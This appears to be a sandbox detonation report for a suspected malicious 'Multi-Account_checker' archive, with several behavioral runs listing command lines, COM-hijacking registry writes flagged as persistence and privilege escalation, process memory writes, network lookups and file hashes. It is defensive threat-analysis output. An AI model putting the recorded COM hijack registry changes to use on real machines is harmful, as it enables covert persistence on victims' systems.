Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

261s

Max time network

271s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Network

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240508-en

Max time kernel

292s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2556 -s 92

Network

N/A

Files

memory/2556-0-0x0000000068AC0000-0x0000000068AE6000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

248s

Max time network

263s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240221-en

Max time kernel

121s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240419-en

Max time kernel

118s

Max time network

121s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy_InUse.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

282s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240226-en

Max time kernel

287s

Max time network

311s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1344 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 216.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 227.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.200.42:443 chromewebstore.googleapis.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

118s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21042\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI21042\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI21042\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

C:\Users\Admin\AppData\Local\Temp\_MEI21042\api-ms-win-core-file-l1-2-0.dll

MD5 b5060343583e6be3b3de33ccd40398e0
SHA1 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

C:\Users\Admin\AppData\Local\Temp\_MEI21042\api-ms-win-core-timezone-l1-1-0.dll

MD5 36165a5050672b7b0e04cb1f3d7b1b8f
SHA1 ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256 d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512 da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

C:\Users\Admin\AppData\Local\Temp\_MEI21042\api-ms-win-core-file-l2-1-0.dll

MD5 2e8995e2320e313545c3ddb5c71dc232
SHA1 45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256 c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

C:\Users\Admin\AppData\Local\Temp\_MEI21042\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240226-en

Max time kernel

229s

Max time network

312s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2232 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 227.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

memory/1196-0-0x0000000068AC0000-0x0000000068AE6000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240220-en

Max time kernel

118s

Max time network

121s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Network

N/A

Files

N/A